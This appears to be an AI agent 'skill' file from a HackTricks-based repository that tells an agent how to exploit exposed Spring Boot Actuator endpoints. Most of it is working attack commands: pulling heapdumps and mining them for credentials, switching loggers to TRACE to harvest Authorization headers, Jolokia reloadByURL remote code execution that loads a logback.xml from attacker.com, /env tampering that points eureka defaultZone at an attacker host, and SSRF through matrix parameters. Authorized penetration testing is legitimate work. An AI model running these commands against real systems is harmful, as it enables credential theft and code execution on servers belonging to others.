Hacktricks-skills spring-actuator-pentest
Spring Boot Actuator exploitation for penetration testing. Use this skill whenever you need to assess Spring Boot applications for actuator misconfigurations, extract secrets from heapdumps, abuse logging endpoints for credential capture, or test for RCE via Jolokia. Trigger this skill for any Spring Boot security assessment, actuator endpoint enumeration, JVM heap analysis, or when investigating exposed /actuator endpoints on target systems.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/network-services-pentesting/pentesting-web/spring-actuators/SKILL.MDsource content
Spring Boot Actuator Pentesting
A comprehensive skill for exploiting Spring Boot Actuator misconfigurations during security assessments.
Overview
Spring Boot Actuators expose operational endpoints that can leak sensitive data or enable remote code execution when misconfigured. This skill covers:
- Endpoint enumeration - Discover exposed actuator endpoints
- Secret extraction - Mine credentials from heapdumps
- Logging abuse - Capture credentials via verbose logging
- RCE exploitation - Exploit Jolokia and environment manipulation
Quick Start
# Enumerate actuator endpoints curl -s http://target/actuator | jq . # Check for heapdump exposure curl -s http://target/actuator/heapdump -O heapdump # Extract secrets from heapdump ./scripts/extract-heapdump-secrets.sh heapdump
Endpoint Enumeration
Default Actuator Endpoints
Spring Boot registers these endpoints by default:
| Endpoint | Purpose | Risk Level |
|---|---|---|
| Application health | Low |
| Application info | Low |
| Environment properties | High |
| Spring beans | Medium |
| HTTP request trace | Medium |
| Log file contents | High |
| Logger configuration | High |
| JVM heap snapshot | Critical |
| JMX over HTTP | Critical |
| URL mappings | Medium |
| Thread dump | Medium |
| Application shutdown | Critical |
| Application restart | Critical |
| HTTP exchange history | High |
| Configuration properties | Medium |
Version Differences
- Spring Boot 1.x: Actuators at root path (
,/env
)/health - Spring Boot 2.x+: Actuators under
prefix (/actuator/
,/actuator/env
)/actuator/health
Enumeration Script
Use the enumeration script to discover all exposed endpoints:
./scripts/enumerate-actuators.sh http://target:8080
This script:
- Checks for
and root-level endpoints/actuator - Tests common actuator paths
- Reports accessible endpoints with status codes
- Identifies version (1.x vs 2.x) based on path structure
Heapdump Secrets Mining
When
/actuator/heapdumpQuick Extraction
# Download heapdump curl -s http://target/actuator/heapdump -O heapdump # Extract secrets using the script ./scripts/extract-heapdump-secrets.sh heapdump
Manual Extraction
# Quick wins: search for common credential patterns strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client' # Decode Base64 credentials printf %s 'BASE64_STRING' | base64 -d
High-Value Targets
Look for these patterns in heapdumps:
- Database credentials:
,DataSourceProperties
objectsHikariDataSource - API keys:
entriesOriginTrackedMapPropertySource - Basic Auth:
headers in memoryAuthorization: Basic - Service URLs: Eureka
with embedded credentialsdefaultZone - Spring properties:
management.endpoints.web.exposure.include
VisualVM Analysis
For deeper analysis, open the heapdump in VisualVM and run OQL queries:
select s.toString() from java.lang.String s where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
JDumpSpider
Automated extraction with JDumpSpider:
java -jar JDumpSpider-*.jar heapdump
Logging Abuse for Credential Capture
When
/actuator/loggersEnable Verbose Logging
# List available loggers curl -s http://target/actuator/loggers | jq . # Enable TRACE for security packages ./scripts/configure-loggers.sh http://target TRACE org.springframework.security org.springframework.web
Manual Configuration
# Enable TRACE for Spring Security curl -s -X POST http://target/actuator/loggers/org.springframework.security \ -H 'Content-Type: application/json' \ -d '{"configuredLevel":"TRACE"}' # Enable TRACE for Spring Web curl -s -X POST http://target/actuator/loggers/org.springframework.web \ -H 'Content-Type: application/json' \ -d '{"configuredLevel":"TRACE"}' # Enable TRACE for Spring Cloud Gateway curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \ -H 'Content-Type: application/json' \ -d '{"configuredLevel":"TRACE"}'
Harvest Credentials from Logs
# Read logs from actuator curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password=' # Find log file path from environment curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
Reset Log Levels
Always reset log levels after testing:
./scripts/configure-loggers.sh http://target null org.springframework.security org.springframework.web
Or manually:
curl -s -X POST http://target/actuator/loggers/org.springframework.security \ -H 'Content-Type: application/json' \ -d '{"configuredLevel":null}'
Remote Code Execution via Jolokia
The
/jolokiareloadByURLTest for Jolokia RCE
./scripts/test-jolokia-rce.sh http://target:8080
Manual Exploitation
# Test Jolokia availability curl -s http://target/jolokia/list # Exploit reloadByURL for RCE curl -s 'http://target/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://attacker.com/logback.xml'
Crafted logback.xml Payload
<configuration> <appender name="RCE" class="ch.qos.logback.core.net.SMTPAppender"> <personal>$(whoami)</personal> </appender> <root level="INFO"> <appender-ref ref="RCE"/> </root> </configuration>
Environment Manipulation via /env
When Spring Cloud Libraries are present, the
/envModify Properties
# Spring Boot 1.x (form-encoded) curl -s -X POST http://target/env \ -H 'Content-Type: application/x-www-form-urlencoded' \ -d 'eureka.client.serviceUrl.defaultZone=http://attacker.com/n/xstream' # Spring Boot 2.x (JSON) curl -s -X POST http://target/actuator/env \ -H 'Content-Type: application/json' \ -d '{"name":"eureka.client.serviceUrl.defaultZone","value":"http://attacker.com/n/xstream"}'
Dangerous Properties
These properties can be manipulated for various exploits:
- Database connection stringspring.datasource.tomcat.url
- Database credentialsspring.datasource.tomcat.username
- Database passwordspring.datasource.tomcat.password
- SQL injection vectorspring.datasource.tomcat.validationQuery
- XStream deserializationeureka.client.serviceUrl.defaultZone
SSRF via Matrix Parameters
Spring's handling of matrix parameters (
;Exploit Request
GET ;@evil.com/path HTTP/1.1 Host: target.com Connection: close
Or with curl:
curl -s 'http://target.com/;@evil.com/path' -H 'Host: target.com'
Workflow Recommendations
Initial Reconnaissance
- Enumerate all actuator endpoints
- Check for
vs root-level endpoints (version detection)/actuator - Test for
exposure/heapdump - Check
and/env
accessibility/loggers
Secret Extraction
- Download heapdump if available
- Run extraction script for quick wins
- Use VisualVM for deeper analysis
- Test extracted credentials on adjacent services
Credential Capture
- Enable TRACE logging for security packages
- Trigger authentication traffic
- Harvest credentials from logs
- Reset log levels when done
RCE Testing
- Check for
endpoint/jolokia - Test
actionreloadByURL - Attempt environment manipulation via
/env - Test matrix parameter SSRF
Safety and Ethics
- Only test systems you have authorization to assess
- Reset log levels after testing to avoid performance impact
- Document all findings and remediation recommendations
- Be aware that heapdumps may contain PII requiring special handling